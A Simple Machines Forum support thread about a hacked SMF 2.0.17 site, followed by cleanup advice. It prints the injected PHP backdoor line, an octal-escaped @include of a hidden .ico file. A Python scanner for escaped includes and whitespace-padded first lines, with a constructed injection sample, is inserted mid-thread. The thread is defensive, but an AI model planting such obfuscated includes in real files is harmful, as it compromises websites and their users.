Simple Machines Community Forum

SMF Support => SMF 2.0.x Support => Topic started by: bynw - April 22, 2020, 10:16:35 PM

Title: hacked help
Post by: bynw - April 22, 2020, 10:16:35 PM
I have a second problem. I have been hacked. I am finding new index.php files with code such as:


<?php
/*bea04*/

@include "\057hom\145/ma\162ikp\156d/r\150emu\164hca\163tle\056com\057sed\151na/\160hot\157gal\154ery\057pho\164o00\060108\0670/.\142fdc\145ecb\056ico";

/*bea04*/


This sometimes is the only code in the index.php file or the proper index.php file has this coded added to the top. I've changed database name/password. I have moved the site to another server. Yet this code keeps showing up. No matter what I do. Is it somewhere in the database then?

How can I get rid of it. Maybe my other issue will go away after that. I haven't tried replacing any files that have been modified only editing out the extra incorrect code and then deleting any of those extra index.php files from directories.

Also if a directory had an index.htm(l) file it gets renamed to index.htm(l).bak.bak

Title: Re: hacked help
Post by: vbgamer45 - April 22, 2020, 10:18:13 PM
Best bet is to copy all your files, back up the files,

Then do a clean install of SMF.


If you run other scripts such as wordpress that can also be the source of the infection.
Title: Re: hacked help
Post by: Sir Osis of Liver - April 22, 2020, 10:20:37 PM
Backup your database and files, delete ALL files in forum directory, upload clean set of files, upload Settings.php and Settings_bak.php from backup, reinstall mods and themes.  The hack can be in multiple files/directories and reinstalls itself when you clean up index.php.

Title: Re: hacked help
Post by: Looking - April 22, 2020, 10:48:44 PM
Besides the files you need to also make sure:

DB has not been compromised with inserted code that can be brought back up.
Strange accounts on DB that may have unauthorized privileges,
Host security. For instance, versions of software, firewall, shared resources, etc.
Title: Re: hacked help
Post by: Illori - April 23, 2020, 05:06:51 AM
https://wiki.simplemachines.org/smf/How_to_upload_a_fresh_set_of_files

make sure you reset all your passwords associated with your hosting.
Title: Re: hacked help
Post by: Doug Heffernan - April 23, 2020, 05:54:38 AM
What version of SMF do you have? This looks like a case of the server being compromised. Bring your host up to date on this too. Another thing that I would be looking for are backdoors.
Title: Re: hacked help
Post by: bynw - April 23, 2020, 12:11:06 PM
I'm using 2.0.17

I cleaned up the files that were modified. At least that I could tell were modified. And moved it to another host. Fortunately I have more than one available. After moving it that did change the database name/password. FTP information all got changed.

But again I discovered the modified files. So I really think something in the database itself has been compromised, since I transferred that to the new host as well.

I'm going to try the fresh install and see what happens. Wish I knew what to look for in the database to see if there is any malicious code there hiding.
Title: Re: hacked help
Post by: Kindred - April 23, 2020, 12:15:20 PM
if you moved the entire contents and only "cleaned" files which you THOUGHT were compromised, then chances are you actually missed the installed back door.

Usually, once they get in, they will put an actual back door buried 23 directories deep.

That's why you were asked to DELETE EVERYTHING, put back a KNOWN CLEAN copy of SMF and then restore specific files/directories as you confirm that they are not compromised.
Title: Re: hacked help
Post by: Doug Heffernan - April 23, 2020, 01:51:12 PM
Quote from: bynw - April 23, 2020, 12:11:06 PM
I'm using 2.0.17

I'm going to try the fresh install and see what happens. Wish I knew what to look for in the database to see if there is any malicious code there hiding.

The hidden malicious code a.k.a the backdoor, is going to be in the forum folder and not in the database.
Title: Re: hacked help
Post by: Sir Osis of Liver - April 23, 2020, 04:11:12 PM
Cleaned up a couple of hacks where all index.php files in all subdirectories were infected, as were multiple source files.  You're not going to fix this by nitpicking files.  Once the files are clean, then you can worry about the database, but don't think that will be necessary.

Title: Re: hacked help
Post by: Arantor - April 23, 2020, 04:17:56 PM
I would assume every single PHP file is infected, not just index.php ones.

I've seen some sneaky ones over the years, like embedding themselves on the very first line (the <?php line) with a lot of spaces so that in a normal editor you wouldn't see the code because the spaces pushed it to the right.

If you're not going to start with what the industry calls 'nuke and pave', the very first step must be to contain infection by making all files and folders read-only so nothing can be altered without you doing it.
Title: Re: hacked help
Post by: Bobby - April 24, 2020, 03:15:10 PM
You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!
Title: Re: hacked help
Post by: Kindred - April 24, 2020, 03:19:31 PM
Quote from: Bobby - April 24, 2020, 03:15:10 PM
You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!


no....    this is wrong


first and foremost - he needs to back up the FILES as well, otherwise he'll lose all attachments and avatars.


We've told him.

Backup (database and files)
delete all files and directories other than Settings.php
load clean files from upgrade archive
(no need to run upgrade.php)
Reset all users to the default theme
then restore the contents of avatars and attachments as contents are confirmed to be clean.
re-install custom theme from scratch
re-install mods from scratch
Title: Re: hacked help
Post by: Bobby - April 24, 2020, 03:38:13 PM
Quote from: Kindred - April 24, 2020, 03:19:31 PM
Quote from: Bobby - April 24, 2020, 03:15:10 PM
You should:
1. Backup your database
2. Delete all files and folders in public_html/www folder
3. Upload the clean SMF2.1 RC2 to public_html/www folder
4. Run upgrade.php
Good luck!


no....    this is wrong


first and foremost - he needs to back up the FILES as well, otherwise he'll lose all attachments and avatars.


We've told him.

Backup (database and files)
delete all files and directories other than Settings.php
load clean files from upgrade archive
(no need to run upgrade.php)
Reset all users to the default theme
then restore the contents of avatars and attachments as contents are confirmed to be clean.
re-install custom theme from scratch
re-install mods from scratch

Oh yes, I forgot something: you should delete everything in public_html except the attachments and avatars folders and the old Settings.php file, then run upgrade.php! That may be a simple way!
Title: Re: hacked help
Post by: Kindred - April 24, 2020, 04:37:46 PM
no no no no...

there is no need to run upgrade.php.
The OP is not upgrading anything.

See my steps.
follow my steps.

Title: Re: hacked help
Post by: Chen Zhen - April 24, 2020, 06:48:30 PM
The code you posted is actually this (I Xed out the initial path):
@include "/XXXX/XXXX/XXXX.com/sedina/photogallery/photo00010870/.bfdceecb.ico";

Did you attempt to install some sort of 3rd party photo gallery?
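The octal-escaped path in the injected include above, and the first-line padding trick Arantor describes earlier in the thread, can both be checked mechanically rather than by eye. The following Python is an added example, not code from the thread or from SMF: php_unescape, find_suspicious_includes, leading_whitespace_run and SAMPLE are names of mine, and SAMPLE is a constructed file in the same style as the injected code, with a placeholder path rather than the one from the thread.

```python
import re

# PHP double-quoted string escapes: \ooo (1-3 octal digits), \xhh, and the
# usual one-character escapes. Anything else keeps its backslash, as PHP does.
_ESC = re.compile(r'\\([0-7]{1,3}|x[0-9A-Fa-f]{1,2}|.)', re.S)
_SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', 'v': '\v', 'f': '\f',
           '\\': '\\', '"': '"', '$': '$'}
_INCLUDE = re.compile(
    r'@?\s*(include_once|include|require_once|require)\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.I)

def php_unescape(body):
    """Decode the body of a PHP double-quoted string the way the PHP lexer does."""
    def sub(m):
        e = m.group(1)
        if e[0] in '01234567':
            return chr(int(e, 8) & 0xFF)      # octal, silently truncated to a byte
        if e[0] == 'x' and len(e) > 1:
            return chr(int(e[1:], 16))
        return _SIMPLE.get(e, '\\' + e)
    return _ESC.sub(sub, body)

def find_suspicious_includes(php_source):
    """(raw literal, decoded path) for each include/require whose string uses
    escape sequences or resolves to something that is not a .php file."""
    hits = []
    for m in _INCLUDE.finditer(php_source):
        raw = m.group(2)
        decoded = php_unescape(raw)
        if '\\' in raw or not decoded.lower().endswith('.php'):
            hits.append((raw, decoded))
    return hits

def leading_whitespace_run(php_source, threshold=40):
    """Length of the space run between <?php and code on the first line when it
    is at least `threshold`, else 0: the padding that pushes code off-screen."""
    first = php_source.split('\n', 1)[0]
    m = re.match(r'<\?php([ \t]+)\S', first)
    return len(m.group(1)) if m and len(m.group(1)) >= threshold else 0

# Constructed sample (assumption, not a file from any real host): padded first
# line plus an octal-escaped include of a hidden .ico, as in the thread.
SAMPLE = ('<?php' + ' ' * 60
          + r'@include "\057hom\145/EXAMPLE/pub\154ic_html/gal\154ery/.\150idd\145n.ico";'
          + '\n/*bea04*/\n')
```

Run both functions over every .php file under the webroot; a hit in either is a file to replace from a clean archive, not to edit, and the decoded path tells you which non-PHP file is actually carrying the code.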
Title: Re: hacked help
Post by: Arantor - April 24, 2020, 07:10:50 PM
That looks to me like something masquerading as a legitimate URL to smuggle in something not legitimate. Common tactic.
Title: Re: hacked help
Post by: bynw - April 24, 2020, 07:32:15 PM
Quote from: Chen Zhen - April 24, 2020, 06:48:30 PM
The code you posted is actually this (I Xed out the initial path):
@include "/XXXX/XXXX/XXXX.com/sedina/photogallery/photo00010870/.bfdceecb.ico";

Did you attempt to install some sort of 3rd party photo gallery?


No, that was just a folder that was linked to off the forum. Not integrated into it. No PHP files at all. I don't see that .ico file in the backup though.
Title: Re: hacked help
Post by: Chen Zhen - April 24, 2020, 08:49:00 PM
You seem to be at the point of a fresh SMF upgrade for the moment.

When you reinstall your portal, make sure it is the most recent version and also disable any PHP blocks.
If you have any member that has portal admin access or any kind of admin access, temporarily suspend that access.
Any access to writing PHP blocks will allow someone to do what they want to your forum directory.

Do you have any 3rd party scripts that are not part of SMF?
Like some sort of chat or game that runs off of a child path of your SMF forum?


Title: Re: hacked help
Post by: bynw - April 24, 2020, 09:36:33 PM
Quote from: Chen Zhen - April 24, 2020, 08:49:00 PM
You seem to be at the point of a fresh SMF upgrade for the moment.

When you reinstall your portal, make sure it is the most recent version and also disable any PHP blocks.
If you have any member that has portal admin access or any kind of admin access, temporarily suspend that access.
Any access to writing PHP blocks will allow someone to do what they want to your forum directory.

Do you have any 3rd party scripts that are not part of SMF?
Like some sort of chat or game that runs off of a child path of your SMF forum?

I don't think I had PHP blocks on the portal. And didn't see anything when I just now reinstalled it. I'm not using any of the articles features on the portal. Just some side blocks.

The only mods came from SMF
Title: Re: hacked help
Post by: bynw - April 25, 2020, 08:34:36 PM
Thank you for the advice. As now the forums are back up and thankfully there was no code inserted into the database itself. This can happen if the hacker gains access but it looks like they just gained access to the webserver and not the database. And they didn't create a user for themselves on the forum either. Slowly rebuilding the site with the mods.

But I have noticed that the Latest Post hasn't updated in 5 days. In the Forum Stats section at the bottom of the forum home page. Now granted during some of that time the forum was offline. But since it's been back online there have been additional posts made. When clicking on the View the Most Recent Posts on the Forum line in the status section. The new posts show there.
Title: Re: hacked help
Post by: Chen Zhen - April 26, 2020, 07:32:09 PM

Just go into your forum maintenance and run the "Recount all forum totals and statistics" task.
Since you seem to have fixed your initial problem, I'll mark the topic solved.